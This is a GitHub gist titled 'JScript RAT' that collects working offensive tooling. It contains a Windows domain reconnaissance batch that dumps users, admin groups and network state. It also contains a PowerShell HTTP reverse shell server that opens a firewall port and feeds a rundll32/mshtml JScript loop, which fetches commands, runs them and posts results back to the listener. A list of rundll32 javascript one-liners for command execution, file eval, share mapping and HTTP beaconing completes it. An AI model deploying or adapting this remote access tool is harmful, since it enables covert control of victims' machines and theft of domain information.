Created
February 16, 2018 00:04
-
-
Save carnal0wnage/ec43b39b5223bb6e3e093d92912acdb3 to your computer and use it in GitHub Desktop.
JScript RAT - The Beginning...
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Author: Casey Smith @subTee | |
ipconfig /all>> C:\Tools\Debug\1.txt | |
tasklist /v >> C:\Tools\Debug\1.txt | |
net user >>C:\Tools\Debug\1.txt | |
net localgroup administrators>>C:\Tools\Debug\1.txt | |
netstat -ano >> C:\Tools\Debug\1.txt | |
net use >> C:\Tools\Debug\1.txt | |
net view >> C:\Tools\Debug\1.txt | |
net view /domain >> C:\Tools\Debug\1.txt | |
net group "domain users" /domain >> C:\Tools\Debug\1.txt | |
net group "domain admins" /domain >> C:\Tools\Debug\1.txt | |
net group "domain controllers" /domain >> C:\Tools\Debug\1.txt | |
net group "domain computers" /domain >> C:\Tools\Debug\1.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
Author: Casey Smith @subTee | |
.SYNOPSIS | |
Simple Reverse Shell over HTTP. Deliver the link to the target and wait for connectback. | |
.PARAMETER Server | |
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1/connect",false);h.Send();B=h.ResponseText;eval(B) | |
Listening Server IP Address | |
#> | |
$Server = '127.0.0.1' #Listening IP. Change This. | |
function Receive-Request { | |
param( | |
$Request | |
) | |
$output = "" | |
$size = $Request.ContentLength64 + 1 | |
$buffer = New-Object byte[] $size | |
do { | |
$count = $Request.InputStream.Read($buffer, 0, $size) | |
$output += $Request.ContentEncoding.GetString($buffer, 0, $count) | |
} until($count -lt $size) | |
$Request.InputStream.Close() | |
write-host $output | |
} | |
$listener = New-Object System.Net.HttpListener | |
$listener.Prefixes.Add('http://+:80/') | |
netsh advfirewall firewall delete rule name="PoshRat 80" | Out-Null | |
netsh advfirewall firewall add rule name="PoshRat 80" dir=in action=allow protocol=TCP localport=80 | Out-Null | |
$listener.Start() | |
'Listening ...' | |
while ($true) { | |
$context = $listener.GetContext() # blocks until request is received | |
$request = $context.Request | |
$response = $context.Response | |
$hostip = $request.RemoteEndPoint | |
#Use this for One-Liner Start | |
if ($request.Url -match '/connect$' -and ($request.HttpMethod -eq "GET")) { | |
write-host "Host Connected" -fore Cyan | |
$message = ' | |
while(true) | |
{ | |
h = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); | |
h.Open("GET","http://'+$Server+'/rat",false); | |
h.Send(); | |
c = h.ResponseText; | |
r = new ActiveXObject("WScript.Shell").Run(c); | |
p=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); | |
p.Open("POST","http://'+$Server+'/rat",false); | |
p.Send("Done"); | |
} | |
' | |
} | |
if ($request.Url -match '/rat$' -and ($request.HttpMethod -eq "POST") ) { | |
Receive-Request($request) | |
} | |
if ($request.Url -match '/rat$' -and ($request.HttpMethod -eq "GET")) { | |
$response.ContentType = 'text/plain' | |
$message = Read-Host "PS $hostip>" | |
} | |
[byte[]] $buffer = [System.Text.Encoding]::UTF8.GetBytes($message) | |
$response.ContentLength64 = $buffer.length | |
$output = $response.OutputStream | |
$output.Write($buffer, 0, $buffer.length) | |
$output.Close() | |
} | |
$listener.Stop() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Author: Casey Smith @subTee | |
//Execute A Command | |
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("calc"); | |
//Write To A File | |
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";fso=new%20ActiveXObject("Scripting.FileSystemObject");a=fso.CreateTextFile("c:\\Temp\\testfile.txt",true);a.WriteLine("Test");a.Close();self.close; | |
//Read and Execute From A File | |
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();fso=new%20ActiveXObject("Scripting.FileSystemObject");f=fso.OpenTextFile("c:\\Temp\\testfile.txt",1);eval((f.ReadAll())); | |
//Map A Remote Share (WEBDAV) | |
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";n=new%20ActiveXObject('WScript.Network');n.MapNetworkDrive("S:","https://live.sysinternals.com");self.close; | |
//Map A Local Share | |
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";n=new%20ActiveXObject('WScript.Network');n.MapNetworkDrive("S:","\\\\Localhost\\c$");self.close; | |
//Read and Execute Commands From A File | |
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();fso=new%20ActiveXObject("Scripting.FileSystemObject");f=fso.OpenTextFile("c:\\Temp\\Commands.txt",1);while(!f.AtEndOfStream){t=new%20ActiveXObject("WScript.Shell");t.Run("cmd%20/c%20"%20+%20f.ReadLine(),null,true);}; | |
//Retrieve Commands From HTTP | |
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1/a.txt",false);h.Send();B=h.ResponseText;alert(B); | |
//POST results back to Server | |
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("POST","http://127.0.0.1:8081/a.php",false);h.Send("Stuff"); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment